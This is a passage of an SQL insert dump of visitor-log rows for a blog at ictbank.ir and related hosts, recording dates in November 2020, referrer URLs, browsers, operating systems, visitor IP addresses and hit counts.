(6490,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(6491,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(6492,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.24','000',0,1,0),
(6493,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.163.194.151','000',0,1,0),
(6494,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.195','000',0,1,0),
(6495,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.59.186.242','000',0,1,0),
(6496,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.68','000',0,1,0),
(6497,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.105.248','000',0,1,0),
(6498,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.50.235','000',0,1,0),
(6499,'2020-11-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','124.156.185.140','000',0,3,0),
(6500,'2020-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6501,'2020-11-12','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.74.139','000',0,2,0),
(6502,'2020-11-12','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','135.23.118.124','000',0,1,0),
(6503,'2020-11-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6504,'2020-11-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6505,'2020-11-12','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','162.243.194.98','000',0,1,0),
(6506,'2020-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.155.77.77','000',0,2,0),
(6507,'2020-11-12','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.168.62.183','000',0,1,0),
(6508,'2020-11-13','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(6509,'2020-11-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6510,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.224.138','000',0,1,0),
(6511,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.201.24.80','000',0,1,0),
(6512,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(6513,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.224.235.169','000',0,1,0),
(6514,'2020-11-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6515,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.191.119','000',0,1,0),
(6516,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.122.198','000',0,1,0),
(6517,'2020-11-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.71.201.210','000',0,4,0),
(6518,'2020-11-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(6519,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.152.101','000',0,1,0),
(6520,'2020-11-13','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.188.139.59','000',0,1,0),
(6521,'2020-11-13','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(6522,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.221.23.176','000',0,55,0),
(6523,'2020-11-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6524,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','91.211.20.65','000',0,1,0),
(6525,'2020-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,2,0),
(6526,'2020-11-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6527,'2020-11-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6528,'2020-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.111.39','000',0,1,0),
(6529,'2020-11-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.61','000',0,1,0),
(6530,'2020-11-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','91.211.91.62','000',0,1,0),
(6531,'2020-11-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6532,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.104.177','000',0,1,0),
(6533,'2020-11-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6534,'2020-11-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.120.202','000',0,2,0),
(6535,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','18.184.195.200','000',0,1,0),
(6536,'2020-11-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(6537,'2020-11-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6538,'2020-11-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.145.12.230','000',0,1,0),
(6539,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.137.206','000',0,1,0),
(6540,'2020-11-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6541,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,7,0),
(6542,'2020-11-14','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','86.55.180.118','000',0,2,0),
(6543,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.77.203','000',0,1,0),
(6544,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,4,0),
(6545,'2020-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.182.13','000',0,1,0),
(6546,'2020-11-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6547,'2020-11-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6548,'2020-11-14','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','51.103.142.186','000',0,3,0),
(6549,'2020-11-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(6550,'2020-11-15','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.250.213.235','000',0,1,0),
(6551,'2020-11-15','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.129.40.155','000',0,2,0),
(6552,'2020-11-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','62.234.218.151','000',0,3,0),
(6553,'2020-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.98.131','000',0,1,0),
(6554,'2020-11-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(6555,'2020-11-15','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','52.15.167.9','000',0,1,0),
(6556,'2020-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6557,'2020-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.150.160.117','000',0,1,0),
(6558,'2020-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.227.104','000',0,1,0),
(6559,'2020-11-15','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.143.173.51','000',0,1,0),
(6560,'2020-11-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.8.230.126','000',0,3,0),
(6561,'2020-11-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(6562,'2020-11-15','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','23.129.64.181','000',0,1,0),
(6563,'2020-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.209.224','000',0,1,0),
(6564,'2020-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.112.33','000',0,1,0),
(6565,'2020-11-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6566,'2020-11-15','http://82.102.9.14:80/blog','Chrome','Linux','Unknown',NULL,NULL,'','124.156.218.232','000',0,2,0),
(6567,'2020-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6568,'2020-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6569,'2020-11-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(6570,'2020-11-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','73.221.149.187','000',0,1,0),
(6571,'2020-11-15','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','121.46.31.172','000',0,1,0),
(6572,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.3.135','000',0,1,0),
(6573,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','142.93.146.97','000',0,1,0),
(6574,'2020-11-16','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.169.250','000',0,1,0),
(6575,'2020-11-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6576,'2020-11-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6577,'2020-11-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(6578,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.35.255','000',0,1,0),
(6579,'2020-11-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6580,'2020-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.148.155.70','000',0,1,0),
(6581,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.225.61','000',0,1,0),
(6582,'2020-11-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,1,0),
(6583,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.210.213','000',0,1,0),
(6584,'2020-11-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(6585,'2020-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.9','000',0,2,0),
(6586,'2020-11-16','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.209.110.164','000',0,6,0),
(6587,'2020-11-16','https://www.google.hr/','Chrome','Fedora','Unknown',NULL,NULL,'','141.136.156.227','000',0,1,0),
(6588,'2020-11-17','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','166.48.239.66','000',0,1,0),
(6589,'2020-11-17','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.100','000',0,3,0),
(6590,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.209.194.222','000',0,6,0),
(6591,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.127.45','000',0,1,0),
(6592,'2020-11-17','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.52.248.78','000',0,1,0),
(6593,'2020-11-17','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.175.39','000',0,1,0),
(6594,'2020-11-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6595,'2020-11-17','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','109.130.125.140','000',0,1,0),
(6596,'2020-11-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','176.31.252.167','000',0,1,0),
(6597,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.95.83','000',0,1,0),
(6598,'2020-11-17','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','93.72.158.124','000',0,1,0),
(6599,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.80.61','000',0,1,0),
(6600,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.125.184','000',0,1,0),
(6601,'2020-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.36','000',0,2,0),
(6602,'2020-11-17','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','95.103.58.58','000',0,1,0),
(6603,'2020-11-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','113.125.146.138','000',0,2,0),
(6604,'2020-11-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6605,'2020-11-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6606,'2020-11-17','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','5.130.72.125','000',0,1,0),
(6607,'2020-11-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(6608,'2020-11-18','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.215.187.1','000',0,1,0),
(6609,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.158.61','000',0,1,0),
(6610,'2020-11-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(6611,'2020-11-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(6612,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.36.30.245','000',0,1,0),
(6613,'2020-11-18','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.175.39','000',0,2,0),
(6614,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.29.43','000',0,1,0),
(6615,'2020-11-18','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.70','000',0,1,0),
(6616,'2020-11-18','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(6617,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.122.16','000',0,1,0),
(6618,'2020-11-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,4,0),
(6619,'2020-11-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','147.78.65.80','000',0,1,0),
(6620,'2020-11-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.121.100','000',0,1,0),
(6621,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.87.207','000',0,1,0),
(6622,'2020-11-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6623,'2020-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6624,'2020-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6625,'2020-11-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6626,'2020-11-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(6627,'2020-11-18','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','168.119.242.193','000',0,1,0),
(6628,'2020-11-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','168.119.244.99','000',0,1,0),
(6629,'2020-11-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.15.24.212','000',0,1,0),
(6630,'2020-11-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.81.21.205','000',0,1,0),
(6631,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,4,0),
(6632,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.207.92','000',0,1,0),
(6633,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','183.87.39.93','000',0,1,0),
(6634,'2020-11-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6635,'2020-11-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','165.22.237.35','000',0,1,0),
(6636,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.24.67.63','000',0,1,0),
(6637,'2020-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.131.41.232','000',0,1,0),
(6638,'2020-11-19','https://www.google.com.tr/','Firefox','Fedora','Unknown',NULL,NULL,'','78.180.234.55','000',0,1,0),
(6639,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.216.56','000',0,1,0),
(6640,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.90.141.148','000',0,1,0),
(6641,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.67.16.234','000',0,1,0),
(6642,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,1,0),
(6643,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.241','000',0,1,0),
(6644,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.28','000',0,1,0),
(6645,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.36','000',0,1,0),
(6646,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.46.7.194','000',0,1,0),
(6647,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.187','000',0,1,0),
(6648,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.21','000',0,1,0),
(6649,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.107','000',0,1,0),
(6650,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.69','000',0,1,0),
(6651,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.59','000',0,1,0),
(6652,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.219.72.14','000',0,1,0),
(6653,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.1.181.79','000',0,1,0),
(6654,'2020-11-19','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.175.113.38','000',0,1,0),
(6655,'2020-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.223.228','000',0,1,0),
(6656,'2020-11-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','40.71.19.78','000',0,1,0),
(6657,'2020-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6658,'2020-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6659,'2020-11-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.54.248.59','000',0,1,0),
(6660,'2020-11-19','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','213.128.80.60','000',0,1,0),
(6661,'2020-11-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','175.24.91.175','000',0,3,0),
(6662,'2020-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.222.191','000',0,1,0),
(6663,'2020-11-20','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.3',NULL,NULL,'','80.79.116.136','000',0,2,0),
(6664,'2020-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6665,'2020-11-20','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.36.113.142','000',0,1,0),
(6666,'2020-11-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6667,'2020-11-20','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,1,0),
(6668,'2020-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.72.188','000',0,1,0),
(6669,'2020-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.90.239','000',0,1,0),
(6670,'2020-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.176.103','000',0,1,0),
(6671,'2020-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.138.122','000',0,1,0),
(6672,'2020-11-20','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','34.239.114.245','000',0,1,0),
(6673,'2020-11-20','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.165.28','000',0,1,0),
(6674,'2020-11-20','http://design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','188.163.89.86','000',0,1,0),
(6675,'2020-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6676,'2020-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6677,'2020-11-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6678,'2020-11-21','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.117','000',0,1,0),
(6679,'2020-11-21','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.66','000',0,1,0),
(6680,'2020-11-21','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6681,'2020-11-21','http://ictbank.ir/blog','Chrome','FreeBSD','',NULL,NULL,'','104.168.115.188','000',0,1,0),
(6682,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.227.90.26','000',0,1,0),
(6683,'2020-11-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','5.130.72.125','000',0,1,0),
(6684,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.241.126','000',0,1,0),
(6685,'2020-11-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.227.236.38','000',0,1,0),
(6686,'2020-11-21','http://ICTBANK.IR','Vivaldi','Windows','10.0',NULL,NULL,'','168.91.36.33','000',0,1,0),
(6687,'2020-11-21','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.67.212.234','000',0,1,0),
(6688,'2020-11-21','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','104.198.180.165','000',0,3,0),
(6689,'2020-11-21','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','178.148.239.169','000',0,1,0),
(6690,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.147.39','000',0,1,0),
(6691,'2020-11-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(6692,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.180.110','000',0,1,0),
(6693,'2020-11-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6694,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.48.113','000',0,1,0),
(6695,'2020-11-21','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.122.17.108','000',0,1,0),
(6696,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.134.124','000',0,1,0),
(6697,'2020-11-21','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','202.254.236.51','000',0,5,0),
(6698,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.110.173.209','000',0,1,0),
(6699,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.9.216','000',0,7,0),
(6700,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.78.175.86','000',0,2,0),
(6701,'2020-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.68.201','000',0,1,0),
(6702,'2020-11-21','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','51.255.138.178','000',0,1,0),
(6703,'2020-11-22','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.67.212.234','000',0,1,0),
(6704,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.250.143','000',0,1,0),
(6705,'2020-11-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6706,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.44.4.203','000',0,1,0),
(6707,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.44','000',0,1,0),
(6708,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.155','000',0,1,0),
(6709,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.8','000',0,1,0),
(6710,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.247.185.197','000',0,2,0),
(6711,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.182.5.40','000',0,1,0),
(6712,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.22','000',0,1,0),
(6713,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.106','000',0,1,0),
(6714,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.59.48.162','000',0,1,0),
(6715,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.129.24.108','000',0,1,0),
(6716,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(6717,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.50','000',0,1,0),
(6718,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.101','000',0,1,0),
